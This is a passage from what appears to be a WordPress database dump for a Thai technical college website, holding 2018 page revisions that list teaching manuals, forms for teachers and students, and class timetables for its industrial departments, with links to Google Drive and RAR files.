href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></p>\r\n\r\n<h2><a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a></h2>\r\n<h2><a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></h2>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:06:05', '2018-05-06 14:06:05', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2169, 4, '2018-05-06 21:07:31', '2018-05-06 14:07:31', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/file/d/1yfr-R9TRPAKzbTqzhKwgos92gWFEhU63/view?usp=sharing\"><span style=\"color: #800080;\">คู่มือ PLC</span></a></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1h4nIcmATgPGm4SsrvyheCzZT457lOiRc\">ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1sGN5LP53gIappo8Oc-j7Y7zpus4UUxpj\">ว.22</a></p>\r\n <a href=\"https://drive.google.com/drive/folders/1DPvIS_GgW189lGehlVcgYl_M_eVUwPmH?usp=sharing\">เอกสารอบรม PLC 10-11 พฤศจิกายน 2561 new</a>', 'เอกสารพัฒนาการเรียนการสอน', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%ad%e0%b8%81%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-11-12 15:18:59', '2018-11-12 08:18:59', '', 0, 'http://www.technicrayong.ac.th/?page_id=2169', 0, 'page', '', 0),
(2170, 4, '2018-05-06 21:07:31', '2018-05-06 14:07:31', '', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-05-06 21:07:31', '2018-05-06 14:07:31', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0),
(2174, 4, '2018-05-06 21:09:28', '2018-05-06 14:09:28', '<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></p>\r\n<p style=\"padding-left: 30px;\">คู่มือ PLC</p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></p>', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-05-06 21:09:28', '2018-05-06 14:09:28', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0),
(2175, 4, '2018-05-06 21:11:33', '2018-05-06 14:11:33', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\">คู่มือ PLC</span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-05-06 21:11:33', '2018-05-06 14:11:33', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0),
(2176, 4, '2018-05-06 21:13:46', '2018-05-06 14:13:46', '<h2><span style=\"color: #800080;\">ตารางสอน</span></h2>\r\n<h2><span style=\"color: #800080;\">ตารางเรียน</span></h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/wp-admin/post.php?post=2169&action=edit\"><span style=\"color: #800080;\">เอกสารพัฒนาการเรียนการสอน</span></a></h2>\r\n<h2><a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a></h2>\r\n<h2><a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></h2>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:13:46', '2018-05-06 14:13:46', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2177, 4, '2018-05-06 21:14:49', '2018-05-06 14:14:49', '<h2><span style=\"color: #800080;\">ตารางสอน</span></h2>\r\n<h2><span style=\"color: #800080;\">ตารางเรียน</span></h2>\r\n<h2><a href=\"/wp-admin/post.php?post=2169&action=edit\"><span style=\"color: #800080;\">เอกสารพัฒนาการเรียนการสอน</span></a></h2>\r\n<h2><a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a></h2>\r\n<h2><a href=\"https://wp.me/P9wTWB-jb\"><span style=\"color: #800080;\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</span></a></h2>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:14:49', '2018-05-06 14:14:49', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2178, 4, '2018-05-06 21:15:06', '2018-05-06 14:15:06', '<h2><span style=\"color: #800080;\">ตารางสอน</span></h2>\r\n<h2><span style=\"color: #800080;\">ตารางเรียน</span></h2>\r\n<h2><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"/wp-admin/post.php?post=2169&action=edit\">เอกสารพัฒนาการเรียนการสอน</a></span></h2>\r\n<h2><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a></span></h2>\r\n<h2><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></h2>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:15:06', '2018-05-06 14:15:06', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2180, 4, '2018-05-06 21:18:26', '2018-05-06 14:18:26', '<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/?preview_id=1174&preview_nonce=0650d01396&_thumbnail_id=-1&preview=true\"><span style=\"color: #800080;\">ตารางสอน</span></a></h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99/\"><span style=\"color: #800080;\">ตารางเรียน</span></a></h2>\r\n<h2><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"/wp-admin/post.php?post=2169&action=edit\">เอกสารพัฒนาการเรียนการสอน</a></span></h2>\r\n<h2><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a></span></h2>\r\n<h2><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></h2>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:18:26', '2018-05-06 14:18:26', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2181, 4, '2018-05-06 21:20:22', '2018-05-06 14:20:22', '<img class=\"aligncenter size-full wp-image-1821\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg\" alt=\"\" width=\"198\" height=\"240\" />\n\n<img class=\"aligncenter wp-image-1822\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\n\n<img class=\"aligncenter wp-image-1823 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg\" alt=\"\" width=\"468\" height=\"315\" />', 'งานพัฒนาหลักสูตรการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1838-autosave-v1', '', '', '2018-05-06 21:20:22', '2018-05-06 14:20:22', '', 1838, 'http://www.technicrayong.ac.th/1838-autosave-v1/', 0, 'revision', '', 0),
(2182, 4, '2018-05-06 21:22:19', '2018-05-06 14:22:19', '<pre><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/?preview_id=1174&preview_nonce=0650d01396&_thumbnail_id=-1&preview=true\">ตารางสอน</a></span>\r\n\r\n<span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99/\">ตารางเรียน</a></span>\r\n\r\n<span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-admin/post.php?post=2169&action=edit\">เอกสารพัฒนาการเรียนการสอน</a></span>\r\n\r\n<span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span>\r\n\r\n<span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:22:19', '2018-05-06 14:22:19', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2184, 4, '2018-05-06 21:27:11', '2018-05-06 14:27:11', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/?preview_id=1174&preview_nonce=0650d01396&_thumbnail_id=-1&preview=true\">ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99/\">ตารางเรียน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-admin/post.php?post=2169&action=edit\">คู่มือพัฒนาการเรียนการสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:27:11', '2018-05-06 14:27:11', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2186, 4, '2018-05-06 21:34:38', '2018-05-06 14:34:38', '<pre><em><strong>ประเภทวิชาช่างอุตสาหกรรม</strong></em></pre>\r\nแผนกวิชาช่างยนต์\r\n\r\nแผนกวิชาช่างกลโรงงาน\r\n\r\nแผนกวิชาช่างเชื่อมโลหะ\r\n\r\nแผนกวิชาช่างไฟฟ้ากำลัง\r\n\r\nแผนกวิชาช่างอิเล็กทรอนิกส์\r\n\r\nแผนกวิชาช่างก่อสร้าง\r\n\r\nแผนกวิชาเครื่องมือวัดและควบคุม\r\n\r\nแผนกวิชาปิโตรเคมี\r\n\r\nแผนกวิชาเคมีอุตสาหกรรม\r\n\r\nแผนกวิชาเทคโนโลยียาง', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 21:34:38', '2018-05-06 14:34:38', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2187, 4, '2018-05-06 21:35:37', '2018-05-06 14:35:37', '<pre><em><strong>ประเภทวิชาช่างอุตสาหกรรม</strong></em></pre>\r\nแผนกวิชาช่างยนต์/เทคนิคเครื่องกล\r\n\r\nแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต\r\n\r\nแผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ\r\n\r\nแผนกวิชาช่างไฟฟ้ากำลัง\r\n\r\nแผนกวิชาช่างอิเล็กทรอนิกส์\r\n\r\nแผนกวิชาช่างก่อสร้าง\r\n\r\nแผนกวิชาเครื่องมือวัดและควบคุม\r\n\r\nแผนกวิชาปิโตรเคมี\r\n\r\nแผนกวิชาเคมีอุตสาหกรรม\r\n\r\nแผนกวิชาเทคโนโลยียาง', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 21:35:37', '2018-05-06 14:35:37', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2189, 4, '2018-05-06 21:38:55', '2018-05-06 14:38:55', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1c4x-j0d7XBjXqB8PTnA6reTzALVOxY0K\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=10fBODdSELRkQXsXxfaXTlS8YtnUA01xr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=14TUVwKNCx3KrL7IS5kvcUllrnpugYn2m\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางช่างยนต์/เทคนิคเครื่องกล', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%99%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c-%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84', '', '', '2018-05-17 06:28:41', '2018-05-16 23:28:41', '', 0, 'http://www.technicrayong.ac.th/?page_id=2189', 0, 'page', '', 0),
